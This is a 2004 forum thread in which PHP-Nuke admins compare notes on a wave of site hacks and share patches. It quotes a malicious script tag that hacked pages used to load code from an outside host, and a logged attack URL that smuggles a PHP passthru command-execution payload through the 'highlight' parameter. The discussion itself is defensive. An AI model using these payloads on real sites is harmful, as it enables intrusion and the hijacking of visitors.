| Author |
Message |
Evaders99
Site Admin
Joined: Aug 17, 2003
Posts: 12346
|
 Posted:
Sat Nov 20, 2004 7:47 pm |
  |
|
     |
|
VinDSL
Site Admin
Joined: Jul 08, 2003
Posts: 1193
Location: Arizona (USA) Site Admin: Lenon.com Admin: Disipal Designs
|
| Posted:
Sat Nov 20, 2004 10:30 pm |
|
| sting wrote: |
| ...looks like someone found another sql injection exploit... |
Agreed! It's coming up on everyone's radar lately. I'm gonna 'sticky' this... |
_________________
.:: "The further in you go, the bigger it gets!" ::.
.:: VinDSL's Lenon.com | The Disipal Site ::. |
|
 |
|
VinDSL
Site Admin
Joined: Jul 08, 2003
Posts: 1193
Location: Arizona (USA) Site Admin: Lenon.com Admin: Disipal Designs
|
| Posted:
Sat Nov 20, 2004 11:04 pm |
|
From what I've been reading, this is an accurate description...
One of the biggest problems, from what I've read, is the admin often cannot get into his site to fix things because it redirects him too. Can't get into phpMyAdmin, cPanel - nothing. It all depends on where 'they' stuck the exploit. 
LoL! FireFox is looking better all the time, no?  |
_________________
.:: "The further in you go, the bigger it gets!" ::.
.:: VinDSL's Lenon.com | The Disipal Site ::. |
|
|
|
maczan1205
Nuke Soldier
Joined: Mar 30, 2004
Posts: 32
Location: Montréal
|
| Posted:
Sun Nov 21, 2004 10:19 am |
|
After removing the code above from the Nuke-theme footer as described above I checked out some other non-nuke sites that I have on the same domain and found the same code attached to almost every file that had footer in the file name.
One good thing came out of this for me anyway - it scared me enough to "get moving" on upgrading from 7.1 - 7.5 to eliminate the web mail tables and files. |
|
|
|
|
lilacskn
Nuke Soldier
Joined: Mar 11, 2004
Posts: 10
Location: Maine
|
| Posted:
Sun Nov 21, 2004 12:47 pm |
|
i am having this on my site too! it's scaring visitors away, and it's an official site...can anyone help me????
thanks so much!
here is my addy http://jeffbuckleycommunity.com
xoxo jax |
|
|
 |
|
chukar
Nuke Cadet
Joined: Nov 19, 2004
Posts: 7
|
| Posted:
Mon Nov 22, 2004 3:53 pm |
|
Not sure if this is the right thread or not, but I'm getting access denied messages when I try to access admin.php. I was hacked over the weekend with a MHTMLRedir.Exploit injection, and I wonder if this is related to that.
| Quote: |
| One of the biggest problems, from what I've read, is the admin often cannot get into his site to fix things because it redirects him too. Can't get into phpMyAdmin, cPanel - nothing. It all depends on where 'they' stuck the exploit. |
I fixed database problem, but now can't access admin.php. |
|
|
|
|
sting
Site Admin
Joined: Jul 24, 2003
Posts: 1985
Location: Apparently ALWAYS Online. . .
|
| Posted:
Mon Nov 22, 2004 8:40 pm |
|
| VinDSL wrote: |
From what I've been reading, this is an accurate description...
|
The big issue here is that some sites with Admin Secure have still been hit. I haven't actually seen what has been used for the exploit - has anyone gotten a log of it yet?
-sting |
_________________
Is it paranoia if they are really out to get you?
-------------------------------------------------------
sting usually hangs out at nukehaven.net |
|
 |
|
Evaders99
Site Admin
Joined: Aug 17, 2003
Posts: 12346
|
| Posted:
Mon Nov 22, 2004 10:33 pm |
|
Weird mine hasn't with Admin Secure. I know because they've tried hundreds of times over a week period. And another week period before that. All various 61.78.61.* addresses.
Admin Secure blocks this as a Cross-Site Scripting so make sure you enable scripting protection. |
_________________
Helping those that help themselves
Read FIRST or DIE!
"Fighting is terrible, but not as terrible as losing the will to fight."
Star Wars Rebellion Network - Need Help? Evaders Squadron Coding |
|
|
|
schtefan
Nuke Cadet
Joined: Jun 14, 2004
Posts: 8
|
| Posted:
Wed Nov 24, 2004 9:36 am |
|
| Evaders99 wrote: |
| These hacks were blocked by the latest Admin Secure. That's how the IP was recorded. |
Is it through the Admim? Should I change it? |
Last edited by schtefan on Sat Feb 03, 2007 11:45 pm; edited 1 time in total |
|
|
|
Evaders99
Site Admin
Joined: Aug 17, 2003
Posts: 12346
|
| Posted:
Wed Nov 24, 2004 12:45 pm |
|
I'm not really sure - I'm getting an error in Admin Secure when trying to look at the specific details of this hacker. This is the only IP range that is constantly hitting my site, so I expect it is this person - but can someone confirm this?
I would apply all security measures immediately. Best chance to catch and stop this hacker. Check the sticky topic for a link to such addons. |
_________________
Helping those that help themselves
Read FIRST or DIE!
"Fighting is terrible, but not as terrible as losing the will to fight."
Star Wars Rebellion Network - Need Help? Evaders Squadron Coding |
|
|
|
solentsurfer
Nuke Cadet
Joined: Nov 25, 2004
Posts: 1
|
| Posted:
Thu Nov 25, 2004 2:16 pm |
|
I don't have Nuke but have an online shop using MySQL database which has been hacked with MHTMLRedir.exploit.
It appears dynamically, sometimes Nortan detects and sometimes it doesn't. When it does, the bottom address bar on IE shows that another site is trying to be opened. This happens on any page so suggests it is in the database but I cannot find it.
Does anybody have any idea where else it could be or what to look for in a non Nuke site  ?
Also, when it does appear this code is place just inside the bottom body tag of the page:
| Code: |
| <script language="JavaScript" src="http://www.eagle-inspection.com/data/p.php?i=637...8b&to=http://www.iwar.org.uk/pipermail/infocon/2004-March/2004001207.html"></script> |
|
|
|
|
|
jacebenson
Nuke Cadet
Joined: Nov 01, 2003
Posts: 6
|
| Posted:
Tue Nov 30, 2004 5:34 pm |
|
WHere is the FIX? I need the fix been hit twice.... Please someone link to Admin Secure if it fixes? Does it? What can I do? Can I lock the table they're tring to Inject? What can I do to stop them? |
|
|
|
|
Evaders99
Site Admin
Joined: Aug 17, 2003
Posts: 12346
|
| Posted:
Tue Nov 30, 2004 6:00 pm |
|
|
|
|
sting
Site Admin
Joined: Jul 24, 2003
Posts: 1985
Location: Apparently ALWAYS Online. . .
|
| Posted:
Sun Dec 05, 2004 11:28 am |
|
Ok, think I may have found it. Make sure you have the HIGHLIGHT fix taken care of. The latest versions (2.7) of the nuke fixes seem to take care of it - for some reason on the site I monitor that was hit, sentinel was loaded but did not catch it until AFTER I had loaded the 2.7 patch.
Sentinel covers it as an abuse - script. The lastest IP to attempt it was 62.212.77.34 for those of you blocking IP's, and the script looked something like this:
| Code: |
| www.site.com/modules.php?name=Forums&file=viewtopic&t=87&view=previous%0A&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527&rush=echo%20ITSOK;uname%20-a;echo%20ITISOK; |
Of course, I hope this doesn't get flagged for banning when I try to submit... lol
EDIT - At the risk of splitting the nuke community once again, I am going to post a link to Raven's site. While I know that the personalities of this site and that one often clash, I feel that this information is vital to the nuke community, and rather than copy/paste, I will attempt to bring good will and better security to the nuke community during this holiday season. Or something.
Highlight fix is detailed here - http://ravenphpscripts.com/article635.html.
-sting |
_________________
Is it paranoia if they are really out to get you?
-------------------------------------------------------
sting usually hangs out at nukehaven.net |
|
|
|
Fiona
Private
Joined: Nov 10, 2004
Posts: 48
|
| Posted:
Mon Dec 06, 2004 5:57 pm |
|
| sting wrote: |
| The latest versions (2.7) of the nuke fixes seem to take care of it |
Sting: Does 2.6 handle it?
I'm on earlier versions of Nuke (6.5-7.2) using 2.6, and I can't see anything in 2.7 that significantly affects these earlier versions, which is why I haven't applied it to them.
Any idea if I'm right?
-Fi |
|
|
|
|
|
|
